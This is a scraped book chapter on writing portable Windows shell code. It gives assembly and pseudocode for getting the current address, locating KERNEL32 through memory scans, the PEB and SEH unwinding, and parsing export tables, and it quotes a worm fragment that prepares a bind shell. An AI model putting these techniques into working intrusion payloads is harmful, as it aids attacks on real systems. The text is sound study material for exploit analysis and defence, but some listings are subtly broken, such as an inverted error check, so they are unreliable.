Sunteți pe pagina 1din 10

Chapter 11: The Technique of Writing

Portable Shell Code


Shell code never knows beforehand, where it will land, therefore, it must be capable of
surviving under any conditions, automatically adapting for specific operating system. This
is not an easy task, and most hackers were defeated because of insufficient attention to this
issue. The few survivors in such invisible battles have given the cyberspace the
information, which was badly needed by dozens of worms, viruses and their creators…
Since recently, the topic of portable shell code became extremely popular in hackers
community. Some hackers are delighted by it, but others sniff scornfully. Portable software
is the one that is fully abstracted from design features of specific hardware and software.
For example, the printf function can successfully output the "hello, world!" string both to
the monitor and to the teletype. Therefore, it is portable. Note, however, that it is the
function that is portable, not its implementation. Monitor and teletype serve different
code, which is chosen at the stage of compiling and linking the application.
Shell code is the machine code closely related to specific features of the target system.
Therefore, it cannot be portable by definition. There are no shell code compilers, because
there are no adequate languages to describe it. This makes hackers to use Assembly
language or even machine code, which are different for different processors. What is even
worse, "naked" processor is of no interest in isolation from peripheral devices. This is
because the shell code must no only add and multiply, but also open and close files, process
network requests, etc. To achieve this, it must call API functions of the operating systems
or drivers of appropriate devices. Different operating systems use different calling
conventions, and these conventions are very dissimilar. Thus, it is possible to create shell
code supporting a couple dozens of popular operating systems, however, its size would
exceed all allowable limits, because the lengths of the overflowing buffers is measured in
tens of bytes.
Thus, it is agreed to call shell code portable, if it supports the specified family of operating
systems (for example, Windows NT, Window 2000, and Windows XP). As the practice has
shown, this degree of portability is enough for solving most practical tasks. In the long run,
it is much easier to write a dozen of highly tailored shell codes than one universal. Nothing
can be done about this, because portability should be paid, and, in most cases, is achieved at
the expense of increasing the size of shell code. Therefore, striving for portability is
justified only in exceptional situations.

Requirements to the Portable Shell Code


Portable shell code must be fully relocatable (in other words, it must retain usability under
conditions of any location in memory). Additionally, it must use minimum of system-
dependent auxiliary structures, relying only on the least changeable and best documented
ones.
When developing portable shell code, it is intolerable to base on the contents of the CPU
registers for the moment of overflow. This is because their values in general case are
undefined. Thus, this approach can be chosen only from despair, when the shell code
obstinately refuses to fit within the size (in bytes) allocated to it, and the hacker must
improvise, sacrificing the portability.
Hackers that want to write portable shell code must forget about cunning tricks (also known
as "hacks"), and other types of "aerobatics", including undocumented features. Using these
has negative impact on the portability without providing any useful effect in exchange. Just
to illustrate this situation, recall an old anecdote about two programmers. The first one
boasts: "My program is hundred times more elegant, fast and compact than your!" The
second programmer reasonably answers: "But my program works, in contrast to your". The
common opinion about that the hacking is an Art, is true, and no one argues it. However,
this opinion is not particularly true for this case. Cunning tricks might be available to
everyone who has read hacking manuals. However, not everyone is capable of sending the
shell code to the server without making it freeze or crash.

Ways of Achieving Portability


The technique of creating relocatable code is closely related to the architecture of specific
microprocessor. In particular, the x86 line supports the following relative commands:
push/pop, call, and jx. Good old PDP-11 was considerably richer in this respect. What
is the most pleasant, it allowed for using the instruction pointer register in address
expressions, thus considerably simplifying the tasks of hackers. Unfortunately, however,
we do not choose processors. It is the processor that chooses us.
The conditional jump commands, jx, are always relative, because the command operand
specifies the difference between the target address and address of the next command
instead of the target address. Because of this reason, jumps are always relocatable. Two
types of operands are supported: BYTE and WORD/DWORD. Both types are signed, which
means that it is possible to jump both forward and backward (in the latter case the operand
becomes negative).
Unconditional jump commands, jmp, can be both absolute and relative. Relative commands
start from the EBh opcode (operand has the BYTE type) or from the E9h opcode (operand of
the WORD/DWORD type). Absolute unconditional jumps start from EAh, and the operand is
written in the following format: segment: offset. There are also indirect commands that
pass control by the pointer located by an absolute address or by register. The latter is the
most convenient, and can be carried out approximately as follows: mov eax, absolute
address/jmp eax.
The command for calling the call subroutine behaves the same way, as jmp, except for
that it is encoded by different opcodes (E8h is the relative WORD/DWORD operand, and
FFh /2 is the indirect call). Before passing the control to the target address, this command
pushes the return address onto the top of the stack. This return address represents the
address of the command directly following the call command.
Provided that the shell code is located in the stack (and, in case of the local buffers
overflow it falls exactly there), the hacker can use the ESP register as a base. However, for
this purpose, the current ESP value must be known, and this is not always the case. To
determine the current value of the instruction pointer register it is enough to issue the
near call command and retrieve the address using the pop command. Usually, the
code that achieves this goal appears as shown in Listing 11.1.

Listing 11.1. Determining the location of the shell code in memory

00000000: E800000000 call 000000005 ; Push EIP+sizeof(call) into the stack


00000005: 5D pop ebp ; Now ebp register contains the current eip
The code provided in Listing 11.1 is not free from zeros, which, as you recall, are not
tolerable in most cases in the shell code. Therefore, in order to eliminate them, it is
necessary to redirect call "backward" (Listing 11.2).

Listing 11.2. Eliminating parasitic zeros from the shell code

00000000: EB04 jmps 000000006 ; short jump to call


00000002: 5D pop ebp ; ebp contains the address next to call
00000003: 90 nop ; \
00000004: 90 nop ; +- actual shell code
00000005: 90 nop ; /
00000006: E8F7FFFFFF call 000000002 ; push the address of the next command
;into the stack

Drawbacks of Hard-Encoding
Nothing can be simpler that calling API functions by absolute addresses. Having chosen a
function (for instance, let it be the GetCurrentThreadId function exported by
KERNEL32.DLL), process it with the DUMPBIN utility supplied as part of practically any
compiler. Having recognized Relative Virtual Address (RVA) of the required function, it is
necessary to add it to the base load address, reported by DUMPBIN. As a result, absolute
address of the function will be obtained.
The complete session of working with the DUMPBIN utility appears as shown in Listing
11.3.

Listing 11.3. Determining absolute address of the GetCurrentThreadId function by means of


adding its RVA (76A1h) to the base load address of the module (77E80000h)

>dumpbin.exe /EXPORTS KERNEL32.DLL > KERNEL32.TXT


>type KERNEL32.TXT | MORE
ordinal hint RVA name

270 10D 00007DD2 GetCurrentProcessId
271 10E 000076AB GetCurrentThread
272 10F 000076A1 GetCurrentThreadId
273 110 00017CE2 GetDateFormatA
274 111 00019E18 GetDateFormatW

>dumpbin.exe /HEADERS KERNEL32.DLL > KERNEL32.TXT


>type KERNEL32.TXT | MORE

OPTIONAL HEADER VALUES
10B magic #
5.12 linker version
5D800 size of code
56400 size of initialized data
0 size of uninitialized data
871D RVA of entry point
1000 base of code
5A000 base of data
77E80000 image base
1000 section alignment
200 file alignment

On my own machine absolute address of the GetCurrentThreadId function is equal to
77E876A1h, however, in different versions of Windows NT it certainly will be different.
However, the call to this function easily fits within two lines of code (or 7 bytes), as shown
in Listing 11.4.

Listing 11.4. Direct call to the API function by its absolute address

00000000: B8A1867E07 mov eax,0077E86A1


00000005: FFD0 call eax
Now try to call the connect function exported by ws2_32.dll. Process ws2_32.dll with
DUMPBIN and… Wait! Who promised that this DLL would be loaded into the memory?
And, furthermore, even if it happens to be loaded, no one can guarantee that the base
address written in its header matches the actual base load address? After all DLLs are
numerous, and, if this address is already occupied by another module, the operating system
will load this library into another memory region.
Only two DLLs are guaranteed to be present in the address space of any process, and
always are loaded by the same addresses 1. These are KERNEL32.DLL and NTDLL.DLL.
Functions exported by other libraries must be called as shown in Listing 11.5.

Listing 11.5. Pseudocode demonstrating the procedure of calling arbitrary functions

h = LoadLibraryA("ws2_32.DLL");
if (h != 0) __error__;
zzz = GetProcAddress(h, "connect");
Thus, the task of calling an arbitrary function is reduced to searching addresses of the
LoadLibraryA and GetProcAddress functions.

1
Base load address of these DLLs is constant for a given OS version
Direct Search in the Memory
The most universal, portable and reliable method of determining addresses of API functions
consists in scanning the address space of the process to find PE signatures and subsequent
parsing of the export table.
Set the pointer to C0000000h (upper boundary of the user space for Windows 2000
Advanced Server and Datacenter Server, started with the /3GB boot parameter) or to
80000000h (upper boundary of the user space for all the other systems).
Check the pointer availability by means of calling the IsBadReadPrt function exported by
KERNEL32.DLL, or set the custom SEH handler to prevent the system crash (detailed
information on handling structured exceptions was provided in Chapter 5). If there is the
MZ signature, increase the pointer by 3Ch bytes, retrieving the e_lfanew double word,
which contains the offset of the PE signature. If this signature is actually detected, then the
base load address of the dynamic module has been found, and it is possible to proceed with
parsing the export table, from where it is necessary to retrieve the addresses of the
GetLoadLibraryA and GetProcAddress functions. Knowing these addresses, it will be
possible to retrieve all the remaining information. If at least one of the above-mentioned
conditions hasn't been observed, then it is necessary to decrease the pointer by 10000h and
repeat the entire procedure (base load addresses are always multiples of 10000h, therefore,
this technique is legal). Pseudocode that carries out searching for the base addresses of all
loaded modules by PE signature is shown in Listing 11.6.

Listing 11.6. Pseudocode that carries out searching of the base addresses of all loaded
modules by PE signature

BYTE* pBaseAddress = (BYTE*) 0xС0000000; // upper boundary for all systems

while(pBaseAddress) // loop
{
// Check the address for availability for reading
if (!IsBadReadPtr(pBaseAddress, 2))

// Is this MZ?
if (*(WORD*)pBaseAddress == 0x5A4D)

// Is pointer to PE valid?
if (!IsBadReadPtr(pBaseAddress + (*(DWORD*)(pBaseAddress+0x3C)), 4))

// Is this PE?
if (*(DWORD*)(pBaseAddress + (*(DWORD*)(pBaseAddress+0x3C))) == 0x4550)

// Proceed with parsing the export table


if (n2k_simple_export_walker(pBaseAddress)) break;

// Test the next 64-KB block


pBaseAddress -= 0x10000;
}
Parsing the export table is carried out approximately as shown in Listing 11.7. This
example was borrowed from the unnamed worm from BlackHat, complete source code of
which can be found at http://www.blackhat.com.

Listing 11.7. Manually parsing the export table

call here
db "GetProcAddress",0,"LoadLibraryA",0
db "CreateProcessA",0,"ExitProcess",0
db "ws2_32",0,"WSASocketA",0
db "bind",0,"listen",0,"accept",0
db "cmd",0
here:
pop edx
push edx
mov ebx,77F00000h
l1:
cmp dword ptr [ebx],905A4Dh ;/x90ZM
je l2
;db 74h,03h
dec ebx
jmp l1
l2:
mov esi,dword ptr [ebx+3Ch]
add esi,ebx
mov esi,dword ptr [esi+78h]
add esi,ebx
mov edi,dword ptr [esi+20h]
add edi,ebx
mov ecx,dword ptr [esi+14h]
push esi
xor eax,eax
l4:
push edi
push ecx
mov edi,dword ptr [edi]
add edi,ebx
mov esi,edx
xor ecx,ecx
;GetProcAddress
mov cl,0Eh
repe cmps
pop ecx
pop edi
je l3
add edi,4
inc eax
loop l4
jmp ecx
l3:
pop esi
mov edx,dword ptr [esi+24h]
add edx,ebx
shl eax,1
add eax,edx
xor ecx,ecx
mov cx,word ptr [eax]
mov eax,dword ptr [esi+1Ch]
add eax,ebx
shl ecx,2
add eax,ecx
mov edx,dword ptr [eax]
add edx,ebx
pop esi
mov edi,esi
xor ecx,ecx
;Get 3 Addr
mov cl,3
call loadaddr
add esi,0Ch
The main drawback of this method consists in its bulkiness. Recall that the maximum
allowed size of the shell code is limited. Unfortunately, however, nothing better has been
invented till nowadays. Search for the base address also can be optimized. In fact, in the
next few sections I will demonstrate how is it possible to do this. However, parsing the
export table cannot be avoided. This is inevitable payment for the mobility of the shell
code.

Over Open Sights – PEB


PEB analysis is the most popular among all methods of determining the base load address.
As you recall, Process Environment Block (PEB) is an auxiliary data structure, which,
along with other useful information, contains base addresses of all loaded modules.
This popularity is undeserved and cannot be explained. After all, PEB is the internals of the
Windows NT-like operating systems, for which neither documentation, nor include files are
available. Only Microsoft Kernel Debugger detects odds and ends of some information.
This lack of documentation makes hackers prick up their ears. Because PEB is
undocumented, its structure can change in any of the further Windows versions. In fact, this
took place multiple times. If this happens once again, then the example shown in Listing
11.8 will cease to operate (and, by the way, it works only under Windows NT line, and
doesn't work under Windows 9x).
So, think over, if you really need PEB. The only advantage that it provides consists in
extremely compact code.

Listing 11.8. Determining the base address of KERNEL32.DLL by means of analyzing PEB

00000000: 33C0 xor eax,eax ; eax := 0


00000002: B030 mov al,030 ; eax := 30h
00000004: 648B00 mov eax,fs:[eax] ; PEB base
00000007: 8B400C mov eax, [eax][0000C] ; PEB_LDR_DATA
0000000A: 8B401C mov eax, [eax][0001C] ; First element of InInitOrderModuleList
0000000D: AD lodsd ; next element
0000000E: 8B4008 mov eax, [eax][00008] ; next address KERNEL32.DLL

Unwinding the SEH Stack


The SEH handler, assigned by the operating system be default, points to the KERNEL32!
_except_handler3 function. By determining its address, it is possible to determining the
position of one of the cells that is guaranteed to belong to the KERNEL32.DLL module,
after which it only remains to round it off by the value that is multiple of 1000h and then
proceed with searching for the PE signature described in the "Direct Search in Memory"
section, with the only difference that now there is no need to determine the availability of
the pointer before accessing it (because now the pointer is certainly available).
Practically all applications use custom SEH handlers. Therefore, the current handler doesn't
coincide with the handler assigned by the operating system. The shell code must unwind
the chain of handlers, and achieve its end. The last element of the list will contain the
address of KERNEL32!_except_handler3.
The advantage of this technique consists in that it uses only documented properties of the
operating system, and therefore, works on all operating systems of the Windows family,
except for Windows 3.x, where everything is different. Furthermore, it is quite compact.
The example illustrating how to determine the base address of KERNEL32.DLL using SEH
is shown in Listing 11.9.

Listing 11.9. Determining base address of KERNEL32.DLL via SEH. The base address is
returned in the EAX register

00000000: 6764A10000 mov eax,fs:[00000] ; current EXCEPTION_REGISTRATION


00000005: 40 inc eax ; if eax was –1, it will be 0
00000006: 48 dec eax ; rollback to the previous pointer
00000007: 8BF0 mov esi,eax ; esi to EXCEPTION_REGISTRATION
00000009: 8B00 mov eax,[eax] ; EXCEPTION_REGISTRATION.prev
0000000B: 40 inc eax ; if eax was –1, it will be 0
0000000C: 75F8 jne 000000006 ; if nonzero, unwind further
0000000E: AD lodsd ; skip prev
0000000F: AD lodsd ; retrieve handler
00000010: 6633C0 xor ax,ax ; align by 64 KB
00000013: EB05 jmps 00000001A ; jump into the loop body
00000015: 2D00000100 sub eax,000010000 ; go 64 KB down
0000001A: 6681384D5A cmp w,[eax],05A4D ; is this MZ?
0000001F: 75F4 jne 000000015 ; if not MZ, continue unwinding
00000021: 8B583C mov ebx,[eax+3Ch] ; retrieve the pointer to PE
00000024: 813C1850450000 cmp [eax+ebx],4550h ; is this PE?
0000002B: 75E8 jne 000000015 ; if not PE, continue unwinding

Native API
The use of "naked" Native API (also known as raw API) is considered as a kind of hacking
"aerobatics". In fact, however, this is not just. On the contrary, using such perversions
without a reason is the indication of amateurish approach. This is not only because Native
API functions are undocumented and subject to constant changes, but also because they are
unsuitable for direct use (that's why they are called "row"). Actually, these functions are
"half-products", implementing low-level primitives, a kind of building blocks, which
require large amount of "coupling" code. Individual examples of implementation of such a
code can be found in NTDLL.DLL and KERNEL32.DLL.
In Windows NT access to native API functions is carried out through the int 2Eh
interrupt. The interrupt number is loaded into the EAX register, and the address of the
parameters block with argument is loaded into the EDX register. In Windows XP the
sysenter machine command is used for the same purpose, however, main properties of
the int 2Eh have been fully preserved (at least, for the moment).
The most interesting native API functions used in shell codes are listed in Listing 11.10.

Listing 11.10. Main Native API functions

000h AcceptConnectPort (24 bytes of parameters)


00Ah AllocateVirtualMemory (24 bytes of parameters)
012h ConnectPort (32 bytes of parameters)
017h CreateFile (44 bytes of parameters)
019h CreateKey (28 bytes of parameters)
01Ch CreateNamedPipeFile (56 bytes of parameters)
01Eh CreatePort (20 bytes of parameters)
01Fh CreateProcess (32 bytes of parameters)
024h CreateThread (32 bytes of parameters)
029h DeleteFile (4 bytes of parameters)
02Ah DeleteKey (4 bytes of parameters)
02Ch DeleteValueKey (8 bytes of parameters)
02Dh DeviceIoControlFile (40 bytes of parameters)
03Ah FreeVirtualMemory (16 bytes of parameters)
03Ch GetContextThread (8 bytes of parameters)
049h MapViewOfSection (40 bytes of parameters)
04Fh OpenFile (24 bytes of parameters)
051h OpenKey (12 bytes of parameters)
054h OpenProcess (16 bytes of parameters)
059h OpenThread (16 bytes of parameters)
067h QueryEaFile (36 bytes of parameters)
086h ReadFile (36 bytes of parameters)
089h ReadVirtualMemory (20 bytes of parameters)
08Fh ReplyPort (8 bytes of parameters)
092h RequestPort (8 bytes of parameters)
096h ResumeThread (8 bytes of parameters)
09Ch SetEaFile (16 bytes of parameters)
0B3h SetValueKey (24 bytes of parameters)
0B5h ShutdownSystem (4 bytes of parameters)
0BAh SystemDebugControl (24 bytes of parameters)
0BBh TerminateProcess (8 bytes of parameters)
0BCh TerminateThread (8 bytes of parameters)
0C2h UnmapViewOfSection (8 bytes of parameters)
0C3h VdmControl (8 bytes of parameters)
0C8h WriteFile (36 bytes of parameters)
0CBh WriteVirtualMemory (20 bytes of parameters)
0CCh W32Call (20 bytes of parameters)

Comparison of Different Methods of Ensuring Portability


Table 11.1 outlines comparative information about different methods of searching for API
functions addresses. The best method is highlighted in bold.

Table 11.1. Comparative information about different methods of searching for addresses of API
functions

Supported platform Convenience of


Method Portability
NT/2000/XP 9x implementation

Hard-encoding Yes Yes No Yes


Memory search Yes Yes Yes No
PEB analysis Yes No Partially Yes
SEH
Yes Yes Yes Yes
unwinding
Native API yes Partially2 No No

2
Naturally, Windows 9x also has native API, however, it is different from that of Windows
NT/2000/XP native API

S-ar putea să vă placă și